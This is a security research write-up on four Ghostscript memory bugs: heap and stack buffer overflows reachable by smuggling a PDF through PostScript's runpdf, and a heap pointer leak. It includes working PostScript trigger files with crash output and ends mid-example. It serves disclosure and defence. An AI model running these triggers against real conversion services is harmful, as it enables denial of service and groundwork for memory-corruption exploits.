Ghostscript wrap-up: overflowing buffers

This is an overview of CVE-2024-29506, CVE-2024-29507, CVE-2024-29508, and CVE-2024-29509, a set of memory-corruption-related vulnerabilities in Ghostscript ≤ 10.02.1. These are the remaining bugs from our research that we did not end up using in an exploit. Some may be exploitable, but this depends on whether Ghostscript is compiled with hardening countermeasures.

These vulnerabilities impact web applications and other services offering document conversion and preview functionality, as these often use Ghostscript under the hood. We recommend verifying whether your solution (indirectly) makes use of Ghostscript and, if so, updating it to the latest version.

_This is the final part of a three-part series on Ghostscript bugs._

The research for the CVEs in this post was performed by @b0n0b0__, Giorgio and Thomas.

In addition to PostScript files, Ghostscript can also read and interpret PDF files. To do this it used to invoke a PDF interpreter written in PostScript, but recently (as of 9.56.1) the interpreter has been ported to C, separating it from the PostScript interpreter. This switch prevents issues like _ghost in the pdf_, a trick allowing one to embed PostScript code inside a PDF, which would be executed by Ghostscript when rendering the PDF.

However, the new C-based interpreter also opens up a new attack surface. As it turns out, this is not just a potential problem with malicious PDF files: it is also (by design) possible to invoke the new PDF interpreter from within PostScript. In essence you can “smuggle” a PDF inside a PostScript file (we could call this _pdf in the post_). This gives a much more powerful basis to explore the PDF interpreter’s attack surface from, as potential exploits can use PostScript to perform runtime calculations, dynamically generate a payload or trigger the PDF interpreter multiple times.

`-dSAFER` sandbox inside which it is normally executed by Ghostscript.

The Ghostscript documentation details a set of operators for interfacing with the PDF interpreter, including the straightforward `runpdf`:

```
<file> runpdf - Called from the modified PostScript run operator (which copies stdin to a temp file if required). Checks for PDF collections, processes all requested pages.
```

As documented, it expects a `file` object. If we have a PDF file’s contents as a byte-string in PostScript, we have to write it to a file first. Luckily, as explored in part one, this can be done inside the `-dSAFER` sandbox by writing to `/tmp/`.

Alternatively, we can use the `%ram%` prefix instead of a path to a file in `/tmp/`. Similarly to `%pipe%`, it results in a pseudo-file which can be read from and written to. These “files” are kept in memory during a PostScript file’s execution, allowing for an easy way to refer to data as a file object without actually writing to disk. Unlike `%pipe%`, this is not harmful by itself and hence allowed in the `-dSAFER` sandbox.

Now we can pass arbitrary PDF data to the interpreter from within PostScript, but it gets even better: we can also configure the PDF interpreter from within PostScript!

The PDF interpreter supports various flags and parameters to tweak its behavior. You’ll usually see these being passed via the command-line when the PDF interpreter is invoked directly. However, in case of `runpdf`, these parameters are taken from the current PostScript dictionary (think of these as global variables).

As we’ll see in this post, it turns out that validation of several of these parameters is flawed or nonexistent, maybe because they are considered more “trusted” as they’re usually command-line arguments. Vulnerabilities CVE-2024-29509, CVE-2024-29506 and CVE-2024-29507 are all examples of this: memory corruption bugs that can be triggered from PostScript by invoking the PDF interpreter.

A PDF feature you might be familiar with is _password protection_, which allows a PDF creator to lock (parts of) the document behind a password. This involves both relatively weak protections (relying on the PDF viewer to block certain operations) and actual encryption of data. The PDF standard defines several different schemes for this, each determining the algorithm used under the hood.

When the Ghostscript PDF interpreter encounters an encrypted document, it will attempt to use the string parameter `PDFPassword` as a password to unlock the document. In case the document uses encryption variant `R5`, the function `check_password_R5(…)` is called:

```
static int check_password_R5(pdf_context *ctx, char *Password, int PasswordLen, int KeyLen)
{
    int code;

    if (PasswordLen != 0) {
        pdf_string *P = NULL, *P_UTF8 = NULL;

        code = check_user_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        code = check_owner_password_R5(ctx, Password, PasswordLen, KeyLen);
        if (code >= 0)
            return 0;

        /* If the supplied Password fails as the user *and* owner password, maybe its in
         * the locale, not UTF-8, try converting to UTF-8
         */
        code = pdfi_object_alloc(ctx, PDF_STRING, strlen(ctx->encryption.Password), (pdf_obj **)&P);
        if (code < 0)
            return code;
        memcpy(P->data, Password, PasswordLen);
        pdfi_countup(P);
        code = locale_to_utf8(ctx, P, &P_UTF8);
        if (code < 0) {
            pdfi_countdown(P);
            return code;
        }
        code = check_user_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        if (code >= 0) {
            pdfi_countdown(P);
            pdfi_countdown(P_UTF8);
            return code;
        }

        code = check_owner_password_R5(ctx, (char *)P_UTF8->data, P_UTF8->length, KeyLen);
        pdfi_countdown(P);
        pdfi_countdown(P_UTF8);
        if (code >= 0)
            return code;
    }
    code = check_user_password_R5(ctx, (char *)"", 0, KeyLen);
    if (code >= 0)
        return 0;

    return check_owner_password_R5(ctx, (char *)"", 0, KeyLen);
}
```

As explained by the comment, if the supplied password is not initially correct, it is converted to UTF-8 for a second attempt (to account for encoding differences). Before the `locale_to_utf8(…)` invocation, the password is `memcpy`’d into a newly allocated buffer. This code contains a sneaky bug, however: the number of bytes allocated is `strlen(ctx->encryption.Password)`, while the number of bytes copied is `PasswordLen`. The latter is the size of the `PDFPassword` PostScript string. Notably, PostScript strings differ from C strings in that they can contain null bytes (their size is stored separately). In contrast, `strlen` determines a string’s length by the position of the first null byte it encounters. The result is a buffer that is potentially too small for the data copied into it, and hence a buffer overflow.

Let’s look at a concrete example (`\000` encodes a null byte in PostScript):

```
/PDFPassword (hello\000world) def
```

This is a PostScript string of length 11, but `strlen` will consider it to have a length of 5. This means the `memcpy` looks like this:

```
//     char[5]  "hello\000world"  11
memcpy(P->data, Password,         PasswordLen);
```
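The mismatch between the two lengths can be reproduced outside Ghostscript. The following is a minimal sketch in plain C, not Ghostscript code: the `counted_string` type and the `c_length` and `copy_counted` helpers are hypothetical names made up for illustration. It shows that `strlen` stops at the embedded null byte while the stored length does not, and that sizing the allocation from the same length that drives the `memcpy` avoids the overflow.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a PostScript string: bytes plus an explicit length. */
typedef struct {
    const char *data;
    size_t      len;
} counted_string;

/* The length a C string function would report: bytes before the first null byte. */
static size_t c_length(const counted_string *s)
{
    return strlen(s->data);
}

/* Copy the string into a fresh heap buffer sized from the stored length,
 * i.e. the same value that is passed to memcpy. Returns NULL on failure. */
static char *copy_counted(const counted_string *s)
{
    char *buf = malloc(s->len + 1);
    if (buf == NULL)
        return NULL;
    memcpy(buf, s->data, s->len);
    buf[s->len] = '\0';
    return buf;
}

/* "hello\000world" as PostScript sees it: 11 bytes with an embedded null byte. */
static const counted_string example_password = { "hello\0world", 11 };
```

For `example_password`, `c_length` reports 5 while the stored length is 11, which is exactly the gap between the allocated and copied sizes in the vulnerable code.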

Here’s a full PostScript example triggering this bug:

```
% Simple PDF with R5 encryption.
% This is not a very valid PDF but we only need to reach the decryption logic
/Payload (%PDF-1.7
1 0 obj
> >> /Filter /Standard /Length 256 /O /OE /P -1028 /Perms /R 5 /StmF /StdCF /StrF /StdCF /U /UE /V 5 >>
endobj
xref
0 1
0000000000 65535 f
0000000009 00000 n
trailer
>
startxref
0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the PDFPassword to a buffer whose length is larger than its strlen
/PDFPassword (hello\000BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB) def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit
```

```
$ ghostscript -dNODISPLAY 1.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
zsh: segmentation fault (core dumped)  ghostscript -dNODISPLAY 1.ps
```

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

This one is quite straightforward. The boolean `PDFDEBUG` parameter (controlling the value of `ctx->args.pdfdebug`) can be set to enable printing of verbose logging information during the PDF parsing process. The function `pdfi_apply_filter` contains an instance of this:

```
static int pdfi_apply_filter(pdf_context *ctx, pdf_dict *dict, pdf_name *n, pdf_dict *decode,
                             stream *source, stream **new_stream, bool inline_image)
{
    int code;

    if (ctx->args.pdfdebug)
    {
        char str[100];
        memcpy(str, (const char *)n->data, n->length);
        str[n->length] = '\0';
        dmprintf1(ctx->memory, "FILTER NAME:%s\n", str);
    }

    // … …
}
```

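This is a classic stack buffer overflow: if `n->length` is larger than 100, `memcpy` writes past the end of the 100-byte `str` buffer and continues copying data onto other elements of the stack. (With a length of exactly 100, the terminating null byte alone already lands one byte out of bounds.)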
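A bounded variant of such a debug copy could look as follows. This is a sketch under assumptions rather than the upstream fix: `copy_name_bounded` is a hypothetical helper, and truncating over-long names is only one possible policy (rejecting them with an error would be another).

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy a length-counted name into a fixed-size buffer,
 * truncating so that the terminating null byte always fits.
 * Returns the number of name bytes actually copied. */
static size_t copy_name_bounded(char *dst, size_t dst_size,
                                const unsigned char *src, size_t src_len)
{
    size_t n;

    if (dst_size == 0)
        return 0;

    /* Reserve one byte of the destination for the terminator. */
    n = src_len < dst_size - 1 ? src_len : dst_size - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}
```

With a 100-byte destination, at most 99 bytes of the name are copied, so neither the `memcpy` nor the terminator write can leave the buffer.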

In this case, the originating buffer `n->data` comes from the PDF itself. To trigger the bug we make a PDF containing a long filter name:

```
% Simple PDF with a long (>100) filter name
/Payload (%PDF-1.7
1 0 obj
> ] /Type /Pages >> /Type /Catalog >>
endobj
2 0 obj
>
stream
a
endstream
endobj
xref
trailer
>
startxref
0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Enable PDFDEBUG
/PDFDEBUG true def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit
```

```
$ ghostscript -dNODISPLAY 2.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
… …
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 2.ps
```

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

These are two more stack buffer overflows, both in the PDF interpreter’s font substitution logic (`pdfi_open_CIDFont_substitute_file(…)`). This logic lets you configure a substitute for certain fonts that may be used in the PDF. As part of this, the parameters `CIDFSubstPath` and `CIDFSubstFont` are temporarily copied into a fixed-size stack buffer (4096 bytes). However, in both cases their length is not checked before the `memcpy`, resulting in an overflow whenever a parameter is larger than the buffer:

```
char fontfname[gp_file_name_sizeof]; // 4096

// … …

if (ctx->args.cidfsubstpath.data == NULL) {
    memcpy(fontfname, fsprefix, fsprefixlen);
}
else {
    memcpy(fontfname, ctx->args.cidfsubstpath.data, ctx->args.cidfsubstpath.size);
    fsprefixlen = ctx->args.cidfsubstpath.size;
}

if (ctx->args.cidfsubstfont.data == NULL) {
    // … …
}
else {
    memcpy(fontfname, ctx->args.cidfsubstfont.data, ctx->args.cidfsubstfont.size);
    defcidfallacklen = ctx->args.cidfsubstfont.size;
}
```
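For contrast, a length-checked version of this kind of path construction might look like the sketch below. It is not the upstream patch: `build_font_path`, `PATH_BUF_SIZE` and the return convention are assumptions made for illustration. The point is that the combined size of both components (plus the terminator) is validated before anything is copied.

```c
#include <stddef.h>
#include <string.h>

#define PATH_BUF_SIZE 4096  /* assumed to mirror gp_file_name_sizeof */

/* Hypothetical helper: join a length-counted prefix and font name into dst.
 * Returns 0 on success, or -1 if the result (plus '\0') would not fit. */
static int build_font_path(char dst[PATH_BUF_SIZE],
                           const char *prefix, size_t prefix_len,
                           const char *name, size_t name_len)
{
    /* Check each length separately first so the sum below cannot wrap around. */
    if (prefix_len >= PATH_BUF_SIZE || name_len >= PATH_BUF_SIZE)
        return -1;
    if (prefix_len + name_len + 1 > PATH_BUF_SIZE)
        return -1;

    memcpy(dst, prefix, prefix_len);
    memcpy(dst + prefix_len, name, name_len);
    dst[prefix_len + name_len] = '\0';
    return 0;
}
```

A 9999-byte value for either component, as used in the trigger for this bug, is rejected up front instead of being copied past the end of the buffer.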

To trigger this bug, we construct a PDF that contains a font definition to make sure the substitution logic is invoked (specifically, `/Subtype /Type0` to trigger the right code path), and we set `CIDFSubstPath` (or `CIDFSubstFont`) to a very long string:

```
% Simple PDF with a Type0 font
/Payload (%PDF-1.4
1 0 obj
> ] >> >> >> /Contents 2 0 R >>] /Count 1 >> >>
endobj
2 0 obj
>
stream
/F1 1 Tf
endstream
endobj
xref
trailer
>
startxref
0) def

% Write the PDF data to a temporary file
/OutFile (/tmp/out) (w) file def
OutFile Payload writestring
OutFile closefile

% Set the payload to a very long string.
% For brevity, we use `string` to produce a bunch of null bytes
/CIDFSubstPath 9999 string def

% Run the PDF interpreter on the file
(/tmp/out) (r) file runpdf

showpage
quit
```

```
$ ghostscript -dNODISPLAY 3.ps
GPL Ghostscript 10.02.0 (2023-09-13)
Copyright (C) 2023 Artifex Software, Inc.  All rights reserved.
This software is supplied under the GNU AGPLv3 and comes with NO WARRANTY:
see the file COPYING for details.
Processing pages 1 through 1.
Page 1
*** buffer overflow detected ***: terminated
zsh: IOT instruction (core dumped)  ghostscript -dNODISPLAY 3.ps
```

This vulnerability was fixed in Ghostscript 10.03.0, specifically in this commit.

Last but not least, a somewhat unrelated bug. This is not a buffer overflow, but a heap pointer leak. It also does not involve the PDF interpreter, but instead it relates to the PDF output logic (the `pdfwrite` device).

This vulnerability is not as much of a problem by itself as the others in this post, but it may be a useful primitive in a larger exploit. Being able to obtain the memory address of a known object on the heap will indirectly reveal the location of other objects on the heap (modulo some unpredictability). Hence, this is a partial ASLR bypass.
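The general shape of such a leak can be sketched in a few lines of C: an object’s address is formatted into a string that later ends up in attacker-readable output. This is an illustration, not Ghostscript code. `format_font_name` and `recover_address` are hypothetical helpers, and the `.F0x…` naming scheme is an assumption chosen for the example.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: derive a name from the address of a heap object. */
static void format_font_name(char *buf, size_t buf_size, const void *obj)
{
    snprintf(buf, buf_size, ".F0x%" PRIxPTR, (uintptr_t)obj);
}

/* Hypothetical attacker-side helper: parse the address back out of the name.
 * Returns 0 if the name does not have the expected ".F0x" prefix. */
static uintptr_t recover_address(const char *name)
{
    if (strncmp(name, ".F0x", 4) != 0)
        return 0;
    return (uintptr_t)strtoull(name + 4, NULL, 16);
}
```

Anyone who can read the generated name can call something like `recover_address` on it and obtain the exact heap address of the object, without needing any memory corruption.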

The function `pdf_base_font_alloc` used by the `pdfwrite` device prepares font information for inclusion in an output PDF file. In cases where a font has no given name, it will use a hexadecimal pointer representation (`".F" PRI_INTPTR` → `".F0x%p"`) for the constructed `BaseFont` object’s name:

```
if (pfname->size > 0) {
    font_name.data = pfname->chars;
    font_name.size = pfname->size;
    while (pdf_has_subset_prefix(font_name.data, font_name.size)) {
        /* Strip off an existing subset prefix. */
        font_name.data += SUBSET_PREFIX_SIZE;
        font_name.size -= SUBSET_PREFIX_SIZE;
    }
} else {
    gs_snprintf(fnbuf, sizeof(fnbuf), ".F" PRI_INTPTR, (intptr_t)copied);
    font_name.data = (byte *)fnbuf;
    font_name.size = strlen(fnbuf);
}
```

Resulting in, for example:

“`